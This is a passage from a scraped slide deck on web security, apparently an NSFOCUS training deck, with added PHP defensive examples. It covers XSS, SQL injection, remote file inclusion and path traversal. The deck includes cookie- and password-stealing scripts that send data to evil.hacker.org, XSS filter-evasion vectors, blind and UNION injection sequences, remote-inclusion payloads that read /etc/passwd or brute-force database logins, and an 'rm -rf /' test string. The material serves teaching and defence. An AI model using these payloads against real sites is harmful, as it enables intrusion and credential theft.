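// derived from the clock and rand() is not a cryptographic generator, so
// the slide's md5(uniqid(rand(), true)) is guessable by comparison, and a
// counter (the session_id++ slide) is trivially so.
function new_token(): string
{
    return bin2hex(random_bytes(32));
}

function demo(): array
{
    $pw = 'admin@#$%!';                                           // the slide's example password
    $h1 = store_hash($pw);
    $h2 = store_hash($pw);
    return [
        'legacy_equal'    => legacy_hash($pw) === legacy_hash($pw), // true: same for every user
        'legacy_value'    => legacy_hash($pw),                      // what the .mdb dump showed
        'bcrypt_distinct' => $h1 !== $h2,                           // true: per-user salt
        'verify_ok'       => check_password($pw, $h1),              // true
        'verify_bad'      => check_password('admin', $h1),          // false
        'token_len'       => strlen(new_token()),                   // 64 hex characters
        'token_distinct'  => new_token() !== new_token(),           // true
    ];
}

print_r(demo());
```

Because the salt and cost travel inside the stored string, password_verify() needs no extra columns, and password_needs_rehash() can be used at login time to upgrade old hashes when the cost is raised later.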
Attack techniques and defenses: HTTP data in transit
Credentials travel in the clear. Client → Web Server, Post Forum Message / forum login: username aa, password aa_passwd → "Login successful, welcome aa...". An attacker on the path reads the same login from the wire and can replay it.
Over an encrypted channel (the slide's WAP example) the attacker sees only ciphertext: qfw2k3vkei5vinev, faj2fk42iio, 9fj1kjfajffj, fkajlkfiefi2hffkfkff.
An attacker on the same LAN with an ARP-spoofing virus goes further and rewrites the responses, inserting <script> evil code </script> into the "Login successful, welcome aa..." page. Evil: attacked! Encryption in transit protects integrity as well as confidentiality.
Intrusion techniques and defenses: access control flaws
Security by obscurity: Get /afalkjfla/admin123.php → "Admin panel login successful, welcome home admin...". A hidden URL is not access control: once it leaks (from a referer, a backup file, or the admin table read out by blind injection as shown above, Get /query.asp?name=joe' and LEFT(password,1)='m ...), it is open to anyone. Every privileged page must check the session itself.
Intrusion techniques and defenses: the Web 2.0 era
Architecture shift. Classic: user client (browser: HTML+CSS) → HTTP request → web server → database. Ajax: user client (browser: HTML+CSS+JavaScript) → XMLHttpRequest → web or XML service → database. More logic runs on the client and more endpoints are exposed directly.
Open APIs are vulnerable when the cross-domain policy is wide open:
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
With domain="*", any site's Flash content can make authenticated requests to the API and read the responses.
Attack and defense
register_globals, magic_quotes, safe_mode, PHP ...: the open-source community, security vendors and software vendors (Microsoft, Google, 绿盟 NSFOCUS) all have their part of the work. 极光 (Aurora): the leader in vulnerability protection.
NSFOCUS professional services: code audit, penetration testing.
What a code audit flags. Before:
<?php
$query = sprintf("INSERT INTO users(name,pwd) VALUES('%s','%s');", $username, $password);
$result = pg_qu...
After:
<?php
$query = sprintf("INSERT INTO users(name,pwd) VALUES('%s','%s');", addslashes($username), md5($password));
...
Pentest. The NSFOCUS Pen-test Team (绿盟科技渗透测试小组) uses a range of techniques and methods to simulate attacks against the equipment the customer has authorised, verifying the current protective measures, finding the points of risk and providing actionable security advice. ...
This ad space is for rent. Contact 68730606-8502. Bidders interviewed in descending order of offer...
 
Professional Security Solution Provider. Thanks!
Upcoming SlideShare
Loading in …5
×

Web安全解决方案V1.0

3,673 views

Published on

Published in: Technology
0 Comments
17 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,673
On SlideShare
0
From Embeds
0
Number of Embeds
16
Actions
Shares
0
Downloads
0
Comments
0
Likes
17
Embeds 0
No embeds

No notes for slide
  • Web安全解决方案V1.0

    1. 1. Penetration test Software developer Security analyst Security consultation Whatever
    2. 2. 跨站攻击 注入攻击 远程文件执行 CSRF 攻击 访问控制缺陷 配置错误 数据存储不安全 直接对象参考不安全 认证和会话管理不完善 通信不安全
    3. 3. 入侵技术交流 防御 XSS
    4. 5. 1. 攻击者向服务器插入恶意代码 2. 数据库存储恶意代码 姚明… 3. 互联网用户点击主题 4. 数据传送给互联网用户 5. 浏览器执行恶意代码 Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… 郑智… 郭晶晶… 中国队 ..... 攻击者、弱点网站、互联网用户的 互动游戏 Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    5. 6. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... cookies Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    6. 7. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... phishing username/password Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    7. 8. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶… 中国队 ..... spoofed Server Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    8. 9. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> !!! attack code !!! 刘翔… ..... 郑智… ..... 郭晶晶 中国队 ..... botnet Post Forum Message: 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241
    9. 10. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=Wong_Bin <HTML> <Body> Welcome Wong_Bin </Body> </HTML>
    10. 11. <?php print 'welcome '.$_GET['name']; ?> http://example/welcome.php?name=<script>alert(&quot;XSS&quot;)</script> <HTML> <Body> Welcome <script>alert(&quot;XSS&quot;)</script> </Body> </HTML>
    11. 12. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update... &quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> [email_address] Update your email address 确定
    12. 13. <Font size=5> Update your email address</ font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;search&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </ form> <?php ... $email = $_GET['email']; $query = &quot;update user set email='$email' where name='wong'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success update... &quot;; } ?> <?php ... $query = select email from user where name = 'wong' $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_result ($db_query, 0); if ($db_resutl) { echo &quot;<p>EMAIL Address:$ db_resutl <p>&quot;; } ?> <HTML> EMAIL Address: huangbin@nsfocus.com </HTML> huangbin@nsfocus.com<script>document.location ='http://evil.hacker.org/steal_cookies.php?cookies=‘%20+encodeURI(document.cookie);</script> http://evil.hacker.org. Steal Cookes!!! Update your email address 确定
    13. 14. 姚明… Attacker Client Web Server 免费赠送奥运门票 !!! <script> attack code </script> <HTML> 欢迎来到奥运论坛! 用户名: 密 码: </HTML> 刘翔… ..... 郑智… ..... 郭晶晶 ..... 中国队 ..... User_information.txt 记录用户名和密码 奥运论坛 主题 : 免费赠送奥运门票 !!! 内容 : <script> attack code </script> 免费赠送奥运门票 !!! <script> attack code </script> Get /forum.php?fid=122&mid=241 输入用户名、密码。登陆……
    14. 15. … <body background=javascript:evil=document.createElement(&quot;script&quot;);evil.src=&quot;http://evil.hack.org/xss.js&quot;;document.body.appendChild(evil);> … <SCRIPT language=JavaScript> function Phishing() { evil_code = Make a Phishing Page by … document.write(evil_code); } Phishing() </SCRIPT> ... <form>action=&quot;user_infomation.php&quot; method=&quot;post&quot; onsubmit=&quot;evilImg=new Image; evil.src='http://evil.hacker.org/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;&quot;</form> ... <?php if (isset($_POST['username']) && isset($_POST['password'])) { $filename = &quot;/www/user_information.txt&quot;; $file = @fopen($file_path, &quot;a&quot;); $info = &quot;user: &quot;.$_POST['username'].&quot; passwd:&quot;.$_POST['password'].&quot; &quot;; @fwrite($file, $info); @fclose($file); } ?> Phish Attacker Client 请重新登陆 用户: 密码: 确定 取消
    15. 16. <INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;><script>alert('xss')</script> <INPUT TYPE=&quot;image&quot; SRC=&quot;http://example&quot;> <ul><ul><li> Normally </li></ul></ul><ul><ul><li> Evil </li></ul></ul>
    16. 17. <ul><ul><li> Danger </li></ul></ul>replace(str,&quot;<&quot;,&quot;&lt;&quot;) replace(str,&quot;>&quot;,&quot;&gt;&quot;) ‘ <script.*>’ <ul><ul><li> Weak </li></ul></ul>
    17. 18. <INPUT TYPE=&quot;image&quot; SRC=javascript:alert(&quot;xss&quot;) > <ul><ul><li> Evil </li></ul></ul>Dim re     Set re=new RegExp     re.IgnoreCase =True     re.Global=True re.Pattern=&quot;javascript:&quot;     Str = re.replace(Str,&quot;javascript : &quot;)     re.Pattern=&quot;jscript:&quot;    Str = re.replace(Str,&quot;jscript : &quot;)     re.Pattern=&quot;vbscript:&quot;    Str = re.replace(Str,&quot;vbscript : &quot;) set re=nothing <ul><ul><li> N ot so good </li></ul></ul><ul><ul><li> Danger </li></ul></ul>javascript:
    18. 19. <INPUT TYPE=&quot;image&quot; SRC=javascript&#58alert(&quot;xss&quot;)> <ul><ul><li> Evil </li></ul></ul><ul><ul><li> Danger </li></ul></ul>‘ & ’ replace(str,&quot;&&quot;,&quot;&amp;&quot;) <ul><ul><li> Weak </li></ul></ul>
    19. 20. <img src=&quot;javas cript:alert('xss')&quot;> <ul><ul><li> Evil </li></ul></ul><ul><ul><li> Danger </li></ul></ul>replace(str,“ ”,“&nbsp; “) <ul><ul><li> Weak </li></ul></ul>
    20. 21. http://example/weak.php?username=%3A%69%6E%70%75%74%21%74%79%70%65%3D%68%69%64%64%65%6E%20%76%61%6C%75%65%3D%47%6F%74%63%68%61%21%20%6E%61%6D%66%20%3D%20%78%3E%20%3C%73%63%71%69%71%74%3E%20%61%6C%65%72%71%28%78%2C%76%61%6C%75%65%29%27%3C%2F%73%63%72%69%70%74%3E%4A%69%6C http://example/weak.php?username=<input type=hidden value=v name = x> <script>alert(x.value)</script>Wrong <ul><ul><li> Evillooking </li></ul></ul>
    21. 22. function safe_html($msg) { $msg = str_replace('&amp;','&',$msg); $msg = str_replace('&nbsp;',' ',$msg); $msg = str_replace('&quot;','&quot;',$msg); $msg = str_replace(&quot;'&quot;,''',$msg); $msg = str_replace(&quot;<&quot;,&quot;&lt;&quot;,$msg); $msg = str_replace(&quot;>&quot;,&quot;&gt;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &nbsp;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot;&quot;,$msg); $msg = str_replace(&quot; &quot;,&quot; &nbsp; &quot;,$msg); return $msg; } Danger input Encoding input
    22. 23. <img src=&quot;#&quot; onerror=alert(/xss/)> <ul><ul><li> Evil </li></ul></ul><img src=&quot;#&quot; style=“evil:expression(alert(/xss/));&quot;> <img src=&quot;#&quot;/**/onerror=alert(/xss/) > <ul><ul><li> Evil </li></ul></ul><ul><ul><li> Evil </li></ul></ul>
    23. 24. HTML 表单 WEB 程序 数据库 WEB 程序 浏览器    
    24. 25. HTML 表单 WEB 程序 数据库 WEB 程序 浏览器  replace(str, safer, danger) …… …… <ul><ul><li>事前 </li></ul></ul>Htmlspecialchars ($html, ENT_QUOTES) …… <ul><ul><li>事中 </li></ul></ul>FireFox no script …… …… <ul><ul><li>事后 </li></ul></ul>
    25. 26. <ul><ul><li> Danger </li></ul></ul><ul><ul><li> Danger </li></ul></ul>
    26. 27. POST / thepage.jsp?var1=page1.html HTTP/1.1 Accept: */* Referer: http:// www.myweb.com/index.html Accept-Language: en-us,de;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-url-encoded Content-Lenght: 59 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www. myweb.com Connection: Keep-Alive uid=fred&password=secret&pagestyle=default.css&action=login <ul><ul><li>Danger </li></ul></ul>
    27. 28. ‘ <script.*>’ <table background=javascript:evil()> <tr background=javascript:evil()> <body background=javascript:evil()>
    28. 29. <input type='image' src=javascript:evil()> <img src='javascript:evil()’> <frameset> <frame src=&quot;javascript:danger()&quot;>...
    29. 30. <link rel=&quot;stylesheet” href=javascript:evil()> <base href=javascript:evil()>
    30. 31. <meta http-equiv=&quot;refresh“ content=&quot;0;url=javascript:danger()&quot;> <p style='background-image: url(&quot;javascript:danger();&quot;)'); <a href='javascript:danger();'>
    31. 32. <body onload='danger();'> <div onmouseover='danger();'> <div onscroll='danger();'>
    32. 33. <div onmouseenter='danger();'>
    33. 34. <object type=&quot;text/x-scriptlet“ data=&quot;evil.com/danger.js&quot;> <style>@import evil.com/danger.js</style> <div style=&quot;width:expression(danger();)&quot;>
    34. 35. [IE] <div style=&quot;behaviour: url( [link to code] );&quot;> [Mozilla] <div style=&quot;binding: url( [link to code] );&quot;> [IE] <div style=&quot;width: expression( [code] );&quot;> [N4] <style type= &quot;text/javascript&quot;>[code] </style> [IE] <object classid=&quot;clsid:...&quot; codebase=&quot;javascript:[code]&quot; > <style><!--</style> <script>[code]//--></script> <![CDATA[<!--]]> <script>[code]//--></script> <!-- -- --> <script>[code]</script> <!-- -- --> < <script>[code]</script> <img src=&quot;blah&quot;onmouseover=&quot; [code] &quot;> <img src=&quot;blah>&quot; onmouseover=&quot; [code] &quot;> <xml src=&quot; javascript:[code] &quot;> <xml d=&quot;X&quot;><a><b> &lt;script>[code]&lt;/script> ; </b></a> </xml> <div datafld=&quot;b&quot; dataformatas=&quot;html&quot; datasrc=&quot; #X &quot;></div> [UTF-8; IE, Opera] [xC0][xBC]script>[code][xC0][xBC]/script> <a href=&quot; javascript#[code] &quot;> <div onmouseover=&quot; [code] &quot;> <img src=&quot; javascript:[code] &quot;> [IE] <img dynsrc=&quot; javascript:[code] &quot;> [IE] <input type=&quot;image&quot; dynsrc=&quot; javascript:[code] &quot;> [IE] <bgsound src=&quot; javascript:[code] &quot;> & <script>[code]</script> [N4] &{ [code] }; [N4] <img src=&{ [code] };> <link rel=&quot;stylesheet&quot; href=&quot; javascript:[code] &quot;> [IE] <iframe src=&quot; vbscript:[code] &quot;> [ N4] <img src=&quot; mocha:[code] &quot;> [N4] <img src=&quot; livescript:[code] &quot;> < a href=&quot;about: <script>[code]</script> &quot;> <meta http-equiv=&quot;refresh&quot; content=&quot;0;url= javascript:[code] &quot;> <body onload=&quot; [code] &quot;> <div style=&quot;background-image: url( javascript:[code] );&quot;>
    35. 36. Htmlspecialchars() Htmlspecialchars() Strip_tags() $str = strip_tags($_POST['message'], '<b><p><i><u>'); $str = htmlentities($str); echo nl2br($str);
    36. 37. <?php $html = '<p><i><s>Welcome to Nsfocus!</i></p></s>'; print strip_tags($html); print ‘ ’; // Allow <p><i><s> print strip_tags($html, '<p><i><s>'); ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; print strip_tags($html); print &quot; &quot;; // Allow <script> print strip_tags($html, '<script>'); ?> Welcome to Nsfocus! alert(&quot;xss attack!!&quot;)
    37. 38. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href='test'&gt;Test&lt;/a&gt; print $html.&quot; &quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href='test'&gt;Test&lt;/a&gt; print $new_html.&quot; &quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
    38. 39. <?php $html = &quot;<a href='http://example'>evil link</a>&quot;; $new_html = htmlspecialchars($html, ENT_QUOTES); // &lt;a href='test'&gt;Test&lt;/a&gt; print $html.&quot; &quot;; print $new_html; ?> <?php $html = '<script>alert(&quot;xss attack!!&quot;)</script>'; $new_html = htmlentities($html, ENT_QUOTES,’UTF-8’); // &lt;a href='test'&gt;Test&lt;/a&gt; print $new_html.&quot; &quot;; print $html; ?> evil link alert(&quot;xss attack!!&quot;) <a href='test'>Test</a>
    39. 40. $_FILES['message'] $_GET['message'] $_REQUEST['message'] $_POST['message'] $HTTP_GET_VARS['message'] More… $_COOKIE['message'] $_ENV['message'] $_SESSION['message'] $_SERVER['message']
    40. 42. 入侵技术交流 防御 SQL Injection
    41. 44. ... <form action = &quot;login.php&quot; method = &quot;post&quot; name = &quot;login&quot;> 用户 :<input type = &quot;text&quot; name = &quot;username&quot; value = &quot;&quot; maxlength = &quot;20&quot;> 密码 :<input type = &quot;password&quot; name = “password&quot; value = &quot;&quot; maxlength = &quot;20&quot;> <INPUT TYPE=submit name = &quot;confirm&quot; value = &quot; 确定 &quot;> <INPUT TYPE=reset name = &quot;cancel&quot; value = &quot; 取消 &quot;> </form> ... <?php $query= &quot;select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ”; $db_query = mysql_db_query($dbname, $query); $db_resutl = mysql_fetch_array($db_query); if ($db_resutl) { print &quot;Success in... &quot;; } ?> <ul><ul><li> </li></ul></ul>select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ <ul><ul><li> </li></ul></ul>用户: 密码: 确定 取消
    42. 45. select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ admin select * from user where username=‘admin’ and password=‘’ or ‘’=‘’ Success in… ‘ or’’=‘ 用户: 密码: 确定 取消
    43. 46. select * from user where username= ‘$_GET[‘username']’ and password= ‘$_GET[‘password]’ ‘ ;Delete from users;/* select * from user where username=‘‘;Delete from users;/*… Success in… <ul><ul><li> Worse </li></ul></ul>用户: 密码: 确定 取消
    44. 47. <Font size=5>Search page</font> <form name=&quot;inject&quot; method=&quot;post&quot; action=&quot;http://example/Search.php&quot;> <input type=&quot;text&quot; name=&quot;name&quot; size=60> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $search_name = $_GET['search_name']; $ query = &quot;select * from user where username like ‘ %$search_name% ’ order by id desc&quot;; $db_query = mysql_db_query($dbname,$ query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print &quot;Search result... &quot;; } ?> <ul><ul><li> </li></ul></ul>select * from user where username like ‘ %$search_name %‘ order by id desc <ul><ul><li> </li></ul></ul>Search page: 确定
    45. 48. select * from user where username like ‘%$search_name%‘ order by id desc select * from user where username like ‘%%‘ order by id #%’order by id desc All username show… %' order by id# Search page: 确定
    46. 49. <Font size=5>Update your password</font> <form name=&quot;update&quot; method=&quot;post&quot; action=&quot;http://example/update.php&quot;> <input type=&quot;text&quot; name=&quot;password&quot; size=20> <input type=&quot;submit&quot; value=&quot; 确定 &quot;> </form> <?php $passwd = $_GET[‘password ‘]; $query = “update user set passwd='$passwd' where uid='$uid'&quot;; $db_query = mysql_db_query($dbname,$query); $db_resutl = mysql_num_rows($db_query); if ($db_resutl) { print “Success in update... &quot;; } ?> <ul><ul><li> </li></ul></ul>update user set passwd='$passwd' where uid='$uid' <ul><ul><li> </li></ul></ul>Update your password: 确定
    47. 50. update user set passwd='$passwd' where uid='$uid' update user set passwd=‘123’ where uid =‘1’/*where uid =‘252’ Uid1 password chang Update your password: 123’ where uid = ‘1’/* 确定
    48. 51. Get /query.php?name=Wong ' Get /query.php?name=Wong’ and LEFT(password,1)=‘i Web Server … <ul><ul><li>MYSQL SERVER 将 varchar 值“ luyq@#11” 转换时发生语法错误。 /show/query.php ,第 87 行 </li></ul></ul><ul><ul><li>Password 是 luyq@#11 </li></ul></ul>Attacker FALSE FALSE
    49. 52. Attacker Web Server Post /attacktarget?errors=Y&debug=5 Show more … Get /query.php?user=joe’ Error message: $debug = 1 …
    50. 53. show_source() highlight_string() highlight_file() Other Show error message function… <ul><ul><li> Take care </li></ul></ul>error_reporting() Php.ini ------- display_errors = off <ul><ul><li> Better </li></ul></ul>
    51. 54. 1. 判断注入点 MSSQL SERVER!! Get /query.asp?name=Wong ' Get /query.asp?name=Wong and 1=1 Get /query.asp?name=Wong and 1=2 Web Server Attacker FALSE TRUE FALSE
    52. 55. Get /query.asp?name= Wong and (select count(*) from admin)>=0 Get /query.asp?name= Wong and (select count(user) from admin)>=0 Get /query.asp?name= Wong and (select count(username) from admin)>=0 … 1. 判断注入点 2. 探测数据库结构 MYSQLSERVER!! 表名 admin 字段 username.. Attacker Web Server TRUE FALSE TRUE
    53. 56. Get /query.asp?name= Wong and (select top 1 len(username) from admin)>5 Get /query.asp?name= Wong and (select top 1 len(username) from admin)<10 Get /query.asp?name= Wong and (select top 1 len(username) from admin)=8 … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 Attacker Web Server TRUE TRUE TRUE
    54. 57. Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,1,1)='a') Get /query.asp?name= Wong and 1= (select count(*) from admin where id=1 and mid(uaername,2,1)=‘r') … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 表名 admin 字段 username... 用户名长 5 位,密码长 8 位 3. 探测用户名和密码长度 用户名: admin 密码 : jjyy@!&1 4. 探测用户名和密码 Attacker Web Server TRUE FALSE
    55. 58. 1. 判断注入点 MYSQL SERVER!! Get /query.php?name=joe’ Get /query.php?name=joe’ and 1=1 Get /query.php?name=joe’ and 1=2 Web Server Attacker FALSE TRUE FALSE
    56. 59. Get /query.php?name= joe’ and LENGTH(password)>‘5 Get /query.php?name= joe’ and LENGTH(password)<‘15 Get /query.php?name= joe’ and LENGTH(password) =‘13 … 1. 判断注入点 2. 探测密码长度 MYSQLSERVER!! 密码长 13 位 Attacker Web Server TRUE TRUE TRUE
    57. 60. Get /query.asp?name= joe’ and LEFT(password,1)=‘m Get /query.asp?name= joe’ and LEFT(password,1)=‘i Get /query.asp?name= joe’ and LEFT(password,2)=‘f … 1. 判断注入点 2. 探测密码长度 MYSQL SERVER!! 密码长 13 位 密码是 ilovepassword 3. 探测密码 Attacker Web Server FALSE TRUE FALSE
    58. 61. Get /query.php?name= joe’ union select 1,1,1,1,1 from root_user/* Get /query.php?name= admin’ union select 1,1,1,1,1 from admin_user/* … 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 Attacker Web Server FALSE TRUE
    59. 62. Get /query.php?name= joe’and 1<>1 union select 1,1,name,1,1,passwd,1 from admin_user /* 1. 判断注入点 2. 探测数据库结构 MSSQL SERVER!! 密码长 12 位 密码是 ilovepassword 3. 探测用户名和密码长度 猜测到存放管理员信息的 admin_user 表 4. 探测其它表 用户名: admin 密码 : fly_you ! @# 5. 拿到用户名和密码 Attacker Web Server TRUE
Slide 63: Reading files through the injection.
GET /query.php?name=-1' union select 1,1,1,1,load_file('c:/boot.ini') → the web server returns the contents of C:\boot.ini to the client. MySQL's load_file() reads any file the database process can open, so a UNION injection doubles as an arbitrary file read whenever the application's database account holds the FILE privilege.
Slide 64: Server-side input validation flow. Each submitted value passes three checks in turn: data length, data type, and allowed characters. A value that passes all three is accepted as valid; failing any one of them stops processing and returns an error message.
Slide 65: Client-side and server-side checks. Client side: check and filter the input; invalid input gets an error message, valid input is submitted. Server side: check and filter again; valid input is processed, invalid input gets an error message and is logged as an attack record. The attacker bypasses the client-side check simply by sending the request directly (the server responds to the raw request), so only the server-side check counts.
Slide 66: Dangerous characters: < > & ' " + ; whitespace % / #   Danger!
Slide 67: PHP escaping functions and configuration directives: addslashes, mysql_real_escape_string, PDO (prepared statements), escapeshellarg, escapeshellcmd, magic_quotes_gpc, register_globals, safe_mode, allow_url_fopen, open_basedir, disable_functions. Note: the solutions listed here are incomplete; more time is needed to finish them…
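Slides 64 to 67 as working code, an added example rather than code from the deck: the three checks (length, then type, then allowed characters) as a single server-side validator that every request passes whatever the client did, followed by the destination-specific escaping that slide 67 lists by name. The field rules and the sample requests are constructed; the code needs PHP 8.

```php
<?php
// Added example, not from the original deck. Field rules and sample requests are constructed.
const RULES = [
    // field   => [max length, type,     allowed-character whitelist]
    'username' => [32,  'string', '/\A[A-Za-z0-9_]+\z/'],
    'age'      => [3,   'int',    '/\A[0-9]+\z/'],
    'comment'  => [200, 'string', '/\A[\p{L}\p{N} .,!?_-]+\z/u'],
];

/** Returns [cleanValues, errors]; any error means reject the request (and log it, slide 65). */
function validate(array $input): array
{
    $clean = []; $errors = [];
    foreach (RULES as $field => [$maxLen, $type, $pattern]) {
        $value = $input[$field] ?? '';
        if (!is_string($value) || $value === '' || strlen($value) > $maxLen) {
            $errors[$field] = 'length';                        // 1. length check
            continue;
        }
        $typeOk = match ($type) {
            'int'   => filter_var($value, FILTER_VALIDATE_INT) !== false,
            default => true,
        };
        if (!$typeOk) { $errors[$field] = 'type'; continue; }  // 2. type check
        if (!preg_match($pattern, $value)) {                   // 3. character check (whitelist, not blacklist)
            $errors[$field] = 'characters';
            continue;
        }
        $clean[$field] = $type === 'int' ? (int) $value : $value;
    }
    return [$clean, $errors];
}

// Validation decides what gets in; escaping is still applied where data goes out, and
// the escaper is chosen by destination (HTML, shell, SQL), never by the input.
function forHtml(string $s): string  { return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8'); }
function forShell(string $s): string { return escapeshellarg($s); }
// For SQL, bind parameters (PDO / mysqli prepared statements) instead of escaping by hand.

[$ok, $errs] = validate(['username' => 'Wong_Bin', 'age' => '30', 'comment' => 'Welcome!']);
print_r($errs);                                  // Array ( )
[$ok, $errs] = validate([
    'username' => '<script>alert("XSS")</script>',   // the deck's XSS payload
    'age'      => '30; rm -rf /',
    'comment'  => "joe' and 1=1",                     // the deck's injection probe
]);
print_r($errs);   // username => characters, age => length, comment => characters
echo forHtml('<script>alert("XSS")</script>'), "\n";   // &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
echo forShell('30; rm -rf /'), "\n";                   // '30; rm -rf /'
```

The order matters: the cheap length check runs first so an oversized value never reaches the regular expression, and the character check is a whitelist of what the field may contain rather than the blacklist of slide 66, which is always one encoding short.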
Slide 68: Intrusion techniques and defenses: Malicious file execution
Slide 70: Remote file inclusion.
GET /script.php?file=http%3A%2F%2Fevil.hacker.org%2Fevilscript.txt
The web server fetches the attacker's script, executes it, and returns the result to the attacker, here the contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
...
Slide 71: The vulnerable include and the first payload.
<?php include($_GET['file'] . ".php"); ?>
Payload served from evil.hacker.org/evilscript.txt:
<?php print file_get_contents('/etc/passwd'); ?>
GET /script.php?file=http%3A%2F%2Fevil.hacker.org%2Fevilscript.txt
(The script appends ".php" to the parameter, so the attacker either hosts the file under that name or ends the URL with a "?" so that the suffix becomes a harmless query string.)
Slide 72: Second payload: dump every defined variable, database credentials included.
<?php include($_GET['file'] . ".php"); ?>
GET /script.php?file=http%3A%2F%2Fevil.hacker.org%2Fevilscript.txt
<?php var_dump(get_defined_vars()); die(); ?>
Slide 73: Third payload: brute-force the MySQL credentials from inside the web server, where localhost connections are allowed.
<?php include($_GET['file'] . ".php"); ?>
GET /script.php?file=http%3A%2F%2Fevil.hacker.org%2Fevilscript.txt
<?php
print "Guess user & password demo ";
include('http://evil.hacker.org/userGuesses.php');   // defines $userGuesses as user => password pairs
foreach ($userGuesses as $user => $password) {
    $connection = @mysql_connect('localhost', $user, $password);
    if ($connection) {
        print "Success with username: $user. Using password: $password ";
    }
}
?>
Slide 74:
Right: allow_url_fopen = Off and allow_url_include = Off in php.ini (allow_url_include, PHP 5.2 and later, governs include/require separately from allow_url_fopen).
Wrong:
<?php include($_GET['file'] . ".php"); ?>
Advise: treat the parameter as a key into a whitelist, never as a path:
<?php
$page = array(
    'contact' => 'contact.php',
    'help'    => 'help.php',
    'query'   => 'query.php');
if (array_key_exists($_GET['file'], $page)) {
    include('/full/path/' . $page[$_GET['file']]);
}
?>
Slide 75: Path traversal in a file-delete script.
GET /del.php?user=../etc&file=passwd → "Del /etc/passwd success"
POST file=passwd → Success, POST …
Slide 76: What the script intends, and what the attacker's request makes it do.
Intended: delete the named file from the user's home directory.
<?php
// delete the named file from the user's directory
$username = $_GET['user'];
$userfile = $_GET['file'];          // on the original slide $userfile is populated by register_globals
$homedir = "/home/$username";
$file_to_delete = "$userfile";
unlink("$homedir/$userfile");
echo "$file_to_delete has been deleted!";
?>
